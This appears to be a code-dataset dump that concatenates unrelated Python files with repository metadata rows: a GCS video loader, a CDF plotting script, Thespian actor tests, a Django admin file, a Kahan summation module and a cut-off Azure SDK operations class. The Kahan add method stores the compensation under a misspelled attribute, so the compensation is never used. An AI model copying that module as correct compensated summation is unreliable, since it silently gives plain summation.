                    if data['Response'] == 'True':
                        # Found: record and cache the metadata.
                        video['data'] = data
                        with open(filepath, 'w') as fi:
                            fi.write(json.dumps(data))
                        return
                else:
                    # Non-200 aborts the whole search (no negative cache).
                    data = await resp.text()
                    logger.warn(f'error getting video data for {name}, '
                                f'status: {resp.status}, text: {data}')
                    return
        # nothing found, write to that effect...
        with open(filepath, 'w') as fi:
            fi.write(json.dumps({'Response': 'False'}))
    async def finalize(self, app=None):
        # NOTE(review): the worker loop started by initialize() is not
        # stopped here — presumably it is cancelled externally; confirm.
        pass
    async def get_db(self):
        """Return the underlying DB mapping (awaits DB.get())."""
        return await self._db.get()
    async def load_videos(self, prefix='Movies/'):
        """List bucket objects under `prefix` and register video entries.

        Queries the GCS objects API for the 'vangheem-media' bucket, keeps
        only m4v/mov/mp4 files, stores a trimmed record per video in
        db['videos'] keyed by object id, queues each for metadata lookup,
        then persists the DB.
        """
        db = await self._db.get()
        if 'videos' not in db:
            db['videos'] = {}
        util = getUtility(IGCloudBlobStore)
        async with aiohttp.ClientSession() as session:
            access_token = await util.get_access_token()
            url = '{}/vangheem-media/o'.format(OBJECT_BASE_URL)
            resp = await session.get(url, headers={
                'AUTHORIZATION': 'Bearer %s' % access_token
            }, params={
                'prefix': prefix
            })
            data = await resp.json()
            for video in data['items']:
                filename = video['name']
                # The folder placeholder object itself is not a video.
                if filename == prefix:
                    continue
                ext = filename.split('.')[-1].lower()
                if ext not in ('m4v', 'mov', 'mp4'):
                    continue
                # Keep only the fields the app needs from the API response.
                video = {
                    'name': filename,
                    'id': video['id'],
                    'created': video['timeCreated'],
                    'updated': video['updated'],
                    'link': video['mediaLink'],
                    'size': video['size'],
                    'selfLink': video['selfLink']
                }
                db['videos'][video['id']] = video
                await self._queue.put(video)
        await self._db.save()
| [
"[email protected]"
]
| |
b6f5cd268a316233e9b02e99e538aac933b2d87b | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /2-Research_Defense/sample_distribution.py | b70dd6d4e01d8989ed15ce6a6384553f4a8bc803 | []
| no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 2,247 | py | import numpy as np
from fits import cdf_points, flat_fit, linear_fit, cubic_fit, quintic_fit
from util.plot import Plot
from random import seed, sample
values = list(np.percentile(np.random.normal(size=(100000,)),
np.linspace(0,100,1000)))
truth = linear_fit(values)
true_min_max = (min(values), max(values))
# Create a visual of some sample distribution approximations.
def make_plot(functions, prename):
# Initialize some settings.
seed(0); k = 10
pop = sample(values, k)
x, y = cdf_points(pop)
styles = [None, "dashdot", "dot", "dash"]
styles = [None] * 4
# Create the plot.
p = Plot("", "x","CDF", font_family="times", font_size=18)
p.add("Sample", x, y)
p.add_func("Truth", truth, true_min_max, color=p.color((0,0,0,.3)))
for f,s in zip(functions, styles):
name = f.__name__.replace("_"," ").title().split()[0].replace("Flat","EDF")
# Set the legend properties.
if "quintic" in name.lower():
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8, fill='toprevy')
else:
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8)
legend = dict(
xanchor = "center",
yanchor = "top",
x = .25,
y = .8,
orientation = "v",
bgcolor="white",
bordercolor="grey",
borderwidth=.5
)
# Create the plot.
# p.show(y_range=[-.1, 1.1], x_range=true_min_max, width=400*1.4,
# height=300*1.4) #, file_name=prename+"-sample-prediction.html")
# - remove the stuff from quintic fit
# - remove error bar plots
# Fit the errors
p = Plot("", "Absolute Error","CDF", font_family="times", font_size=18)
print("Computing errors..")
fit = f(pop)
errors = abs(np.linspace(0,1,len(values)) - np.array([fit(v) for v in values]))
print("Fitting error distribution..")
fit = linear_fit(errors)
print("Making plot..")
p.add_func("Error", fit, [min(errors),max(errors)])
p.show(width=400*1.4, height=300*1.4)
# Make the two different plots.
functions = [flat_fit, linear_fit, cubic_fit, quintic_fit]
make_plot(functions, "fl")
# functions = [cubic_fit, quintic_fit]
# make_plot(functions, "cq")
| [
"[email protected]"
]
| |
1e7d8c52911d6060dd4720aae9d114a1d173594a | 3049bc6a1d8ed3b1dfe7280a551bf14cd7df1d98 | /thespian/test/testSystemMessages.py | 02bc9eaa2c799e5e75d136ac1c33f6e3addaefec | [
"MIT"
]
| permissive | liuzhijun/Thespian | a9e159f21af1018fe45cce681390fba4fd28bdae | a536cbeace24ab84659160e2a438ebdd62a891e7 | refs/heads/master | 2021-01-15T12:41:27.137415 | 2016-04-08T01:33:27 | 2016-04-08T01:33:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | import unittest
import logging
import time, datetime
import thespian.test.helpers
from thespian.actors import *
from thespian.test import ActorSystemTestCase
class EchoActor(Actor):
    """Actor that logs each received message and sends it straight back."""
    def receiveMessage(self, msg, sender):
        logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
        self.send(sender, msg)
class Kill_The_Messenger(Actor):
    """Actor that answers any message by sending the *sender* an exit request."""
    def receiveMessage(self, message, sender):
        self.send(sender, ActorExitRequest())
class FakeSystemMessage(ActorSystemMessage):
    """User-defined ActorSystemMessage subclass, used by the tests below to
    check that system messages are filtered from ask()/tell() results."""
    pass
# Common short timeout (50 ms) for the ask() calls in these tests.
smallwait = datetime.timedelta(milliseconds=50)
class TestASimpleSystem(ActorSystemTestCase):
    """Message-handling tests against the default ('simple') system base.

    The multiproc subclasses below re-run this whole suite against other
    system bases.
    """
    testbase='Simple'
    scope='func'

    def testCreateActorSystem(self):
        pass

    def testSimpleActor(self):
        echo = ActorSystem().createActor(EchoActor)

    def testSimpleMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, 'hello')
        time.sleep(0.02)  # allow tell to work before ActorSystem shutdown

    def testSystemMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, FakeSystemMessage())
        time.sleep(0.02)  # allow tell to work before ActorSystem shutdown

    def testKillMessageTell(self):
        echo = ActorSystem().createActor(EchoActor)
        ActorSystem().tell(echo, ActorExitRequest())
        time.sleep(0.02)  # allow tell to work before ActorSystem shutdown

    def testKillMessageTellKiller(self):
        ktm = ActorSystem().createActor(Kill_The_Messenger)
        ActorSystem().tell(ktm, 'hello')
        ActorSystem().tell(ktm, ActorExitRequest())
        time.sleep(0.02)  # allow tell to work before ActorSystem shutdown

    def testSimpleMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        self.assertEqual(ActorSystem().ask(echo, 'hello', smallwait), 'hello')

    def testSystemMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        # SystemMessages are explicitly filtered from being returned
        # via Ask() or Tell(), with the exception of PoisonMessage.
        self.assertIsNone(ActorSystem().ask(echo, FakeSystemMessage(), smallwait))

    def testKillMessageAsk(self):
        echo = ActorSystem().createActor(EchoActor)
        # SystemMessages are explicitly filtered from being returned
        # via Ask() or Tell(), with the exception of PoisonMessage.
        self.assertIsNone(ActorSystem().ask(echo, ActorExitRequest(), smallwait))

    def testKillMessageAskKiller(self):
        ktm = ActorSystem().createActor(Kill_The_Messenger)
        self.assertIsNone(ActorSystem().ask(ktm, 'hello', smallwait))
        self.assertIsNone(ActorSystem().ask(ktm, ActorExitRequest(), smallwait))
class TestMultiprocUDPSystem(TestASimpleSystem):
    """Re-runs the full suite over the multiprocess UDP system base."""
    testbase='MultiprocUDP'
    def setUp(self):
        # Select the transport base, then run the shared fixture setup.
        self.setSystemBase('multiprocUDPBase')
        super(TestMultiprocUDPSystem, self).setUp()
class TestMultiprocTCPSystem(TestASimpleSystem):
    """Re-runs the full suite over the multiprocess TCP system base."""
    testbase='MultiprocTCP'
    def setUp(self):
        self.setSystemBase('multiprocTCPBase')
        super(TestMultiprocTCPSystem, self).setUp()
class TestMultiprocQueueSystem(TestASimpleSystem):
    """Re-runs the full suite over the multiprocess Queue system base."""
    testbase='MultiprocQueue'
    def setUp(self):
        self.setSystemBase('multiprocQueueBase')
        super(TestMultiprocQueueSystem, self).setUp()
| [
"[email protected]"
]
| |
743b5ae680bd84ca58609986ff88af66169e4909 | a512b8893b0d2de827d6292e810f3a98b41e132c | /Week8/Day3/Solutions/Python/prog5.py | bdf631feab069e18d120788bb85471ff2fb8701d | []
| no_license | Audarya07/Daily-Flash-Codes | d771079fd0d470e2d3e05679f17f32fb64b4f426 | cf96ca2b1676b038e243fac67be778381492ffeb | refs/heads/master | 2022-11-06T15:37:47.180729 | 2020-06-25T16:20:55 | 2020-06-25T16:20:55 | 274,960,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | print("Point A(x1,y1) = ",end=" ")
a = [int(x) for x in input().split()][:2]
print("Point B(x2,y2) = ",end=" ")
b = [int(x) for x in input().split()][:2]
print("Point c(x3,y3) = ",end=" ")
c = [int(x) for x in input().split()][:2]
distAB = ((b[0]-a[0])**2 + (b[1]-a[1])**2)**0.5
print("Distance AB = ",round(distAB,2))
distBC = ((c[0]-b[0])**2 + (c[1]-b[1])**2)**0.5
print("Distance BC = ",round(distBC,2))
distAC = ((c[0]-a[0])**2 + (c[1]-a[1])**2)**0.5
print("Distance AC = ",round(distAC,2))
| [
"[email protected]"
]
| |
e4a964c0162eae94bed9279674c41123d3a52262 | db217a42aa96688ce2d257820398fcc57bc1f810 | /gpscraper/admin.py | 81efffeec794a7cb5f214403c71d322afd2b92ba | []
| no_license | ans2human/Google-Play-Store-Scraper | 4a3012c5c22feb8dfd92cb9534f6ade400cb096f | ddf576d9c159c98429643e60fb5a642bbe848d49 | refs/heads/master | 2022-12-10T20:10:01.920280 | 2018-10-13T06:27:04 | 2018-10-13T06:27:04 | 149,260,886 | 1 | 1 | null | 2022-07-06T19:52:11 | 2018-09-18T09:16:37 | Python | UTF-8 | Python | false | false | 263 | py | from django.contrib import admin
from gpscraper.models import AppData, AppSearchIndex
@admin.register(AppData)
class AppDataAdmin(admin.ModelAdmin):
    """Changelist configuration for scraped Play Store app records."""
    # Columns shown in the admin changelist view.
    list_display = ('id', 'name', 'dev_name', 'category')


admin.site.register(AppSearchIndex)
| [
"[email protected]"
]
| |
3820e7373bc32531be8713da83fd7a55840bcfc7 | 270363be5ea94d33469fe4271eccb343357d4fa6 | /linalg/kahan/sum.py | 36c6ae09c06c5cab9877e5ad05b987dbbea1f78c | []
| no_license | tkelestemur/learn-linalg | c487389e9802b0223232bcb8c9ec0003cc7df091 | a6e04e903e5c9e00801b56a228c56fd8b8ba8c71 | refs/heads/master | 2023-03-19T05:53:34.407780 | 2021-01-02T13:54:40 | 2021-01-02T14:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | import numpy as np
class KahanSum:
"""Precise summation of finite-precision floating point numbers [1].
Reduces numerical error by storing a running compensation term that captures
lost low-order bits.
References:
[1]: https://en.wikipedia.org/wiki/Kahan_summation_algorithm
"""
def __init__(self):
"""Constructor."""
self.reset()
def reset(self):
"""Clears the internal state."""
# Create one variable for keeping track of the sum and one for storing the
# moving compensation term.
self._sum = 0
self._compensation = 0
def add(self, x):
"""Adds the float x to the summation term."""
x += self._compensation
sum = self._sum + x
self.compensation = x - (sum - self._sum)
self._sum = sum
def result(self):
return self._sum
def kahan_sum(x, axis=None, keepdims=False):
    """Compensated (Kahan) summation over a 1D or 2D array-like.

    Args:
        x: A 1D or 2D array-like object.
        axis: None to sum every element, 0 to sum down columns, 1 across rows.
        keepdims: If True, retain the collapsed axis with length one.

    Returns:
        A scalar (1D input or axis=None) or an ndarray of per-column /
        per-row compensated sums.
    """
    x = np.asarray(x)
    assert x.ndim <= 2, "[!] Only 1D and 2D arrays are currently supported."
    assert axis in [None, 0, 1], "[!] Axis value can only be None, 0 or 1."
    acc = KahanSum()
    # 1D input: single compensated pass over the elements.
    if x.ndim == 1:
        for value in x:
            acc.add(value)
        return acc.result()
    num_rows, num_cols = x.shape
    # 2D, full reduction: accumulate every element into one sum.
    if axis is None:
        for row in x:
            for value in row:
                acc.add(value)
        return acc.result()
    if axis == 0:
        # One compensated sum per column.
        column_sums = []
        for col in range(num_cols):
            acc.reset()
            for row in range(num_rows):
                acc.add(x[row, col])
            column_sums.append(acc.result())
        out = np.asarray(column_sums)
        if keepdims:
            out = out.reshape([1, num_cols])
        return out
    # axis == 1: one compensated sum per row.
    row_sums = []
    for row in range(num_rows):
        acc.reset()
        for col in range(num_cols):
            acc.add(x[row, col])
        row_sums.append(acc.result())
    out = np.asarray(row_sums)
    if keepdims:
        out = out.reshape([num_rows, 1])
    return out
| [
"[email protected]"
]
| |
3538acda3d446425f03488c8e3f2348b3350b383 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/treemap/_visible.py | 537d81152ae25e0c4789549c71e0a378ae159bba | [
"MIT"
]
| permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 470 | py | import _plotly_utils.basevalidators
class VisibleValidator(_plotly_utils.basevalidators.EnumeratedValidator):
    """Enumerated validator for ``treemap.visible``.

    Accepts True, False, or "legendonly"; defaults to the "calc" edit type.
    """

    def __init__(self, plotly_name="visible", parent_name="treemap", **kwargs):
        # Install the defaults only when the caller has not overridden them,
        # then hand the whole kwargs bundle to the EnumeratedValidator base.
        kwargs.setdefault("edit_type", "calc")
        kwargs.setdefault("values", [True, False, "legendonly"])
        super(VisibleValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
| [
"[email protected]"
]
| |
b14782c709a1527188e058d40485c6d3bf1ca83b | d3a0a2cabd572a9e597a399cf6b7012e34a99475 | /flask/script-api/flask/lib/python3.6/encodings/punycode.py | d9595a326e7e834b53f7441490b8b947d6828505 | []
| no_license | rahulgoyal911/Face-Recogniton-Using-OpenCV-and-Python-on-RaspberryPI | 06ed227dc56a0956d668de0d9f78287c75e790f4 | 1bbdfd45adebda0728831065df0580cd48dedef8 | refs/heads/master | 2020-05-01T01:18:18.868473 | 2019-03-24T16:48:21 | 2019-03-24T16:48:21 | 177,192,198 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | /home/rahulgoyal911/anaconda3/lib/python3.6/encodings/punycode.py | [
"[email protected]"
]
| |
770716b524c252a1d6bc14e545f41457cd23a5c4 | 531c47c15b97cbcb263ec86821d7f258c81c0aaf | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/operations/_application_security_groups_operations.py | db3954fd59626929afe5810e4fb75799bdf02e6f | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
]
| permissive | YijunXieMS/azure-sdk-for-python | be364d3b88204fd3c7d223df23756386ff7a3361 | f779de8e53dbec033f98f976284e6d9491fd60b3 | refs/heads/master | 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 | MIT | 2020-06-16T16:38:15 | 2019-08-30T21:08:55 | Python | UTF-8 | Python | false | false | 28,881 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplicationSecurityGroupsOperations(object):
    """ApplicationSecurityGroupsOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2019_02_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # Re-export the generated models module so callers can reach it via the
    # operations-group attribute.
    models = models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def _delete_initial(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> None
        """Issue the initial DELETE request; LRO completion is driven by begin_delete's poller."""
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        # Construct URL
        url = self._delete_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def begin_delete(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> LROPoller
        """Deletes the specified application security group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param application_security_group_name: The name of the application security group.
        :type application_security_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
        polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                application_security_group_name=application_security_group_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def get(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "models.ApplicationSecurityGroup"
        """Gets information about the specified application security group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param application_security_group_name: The name of the application security group.
        :type application_security_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplicationSecurityGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        # Construct URL
        url = self.get.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = 'application/json'
        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def _create_or_update_initial(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        parameters, # type: "models.ApplicationSecurityGroup"
        **kwargs # type: Any
    ):
        # type: (...) -> "models.ApplicationSecurityGroup"
        """Issue the initial PUT request; LRO completion is driven by begin_create_or_update's poller."""
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        content_type = kwargs.pop("content_type", "application/json")
        # Construct URL
        url = self._create_or_update_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = 'application/json'
        # Construct and send request
        body_content_kwargs = {} # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'ApplicationSecurityGroup')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def begin_create_or_update(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        parameters, # type: "models.ApplicationSecurityGroup"
        **kwargs # type: Any
    ):
        # type: (...) -> LROPoller
        """Creates or updates an application security group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param application_security_group_name: The name of the application security group.
        :type application_security_group_name: str
        :param parameters: Parameters supplied to the create or update ApplicationSecurityGroup
        operation.
        :type parameters: ~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
        polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                application_security_group_name=application_security_group_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def _update_tags_initial(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        parameters, # type: "models.TagsObject"
        **kwargs # type: Any
    ):
        # type: (...) -> "models.ApplicationSecurityGroup"
        """Issue the initial PATCH request; LRO completion is driven by begin_update_tags's poller."""
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        content_type = kwargs.pop("content_type", "application/json")
        # Construct URL
        url = self._update_tags_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = 'application/json'
        # Construct and send request
        body_content_kwargs = {} # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'TagsObject')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def begin_update_tags(
        self,
        resource_group_name, # type: str
        application_security_group_name, # type: str
        parameters, # type: "models.TagsObject"
        **kwargs # type: Any
    ):
        # type: (...) -> LROPoller
        """Updates an application security group's tags.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param application_security_group_name: The name of the application security group.
        :type application_security_group_name: str
        :param parameters: Parameters supplied to update application security group tags.
        :type parameters: ~azure.mgmt.network.v2019_02_01.models.TagsObject
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
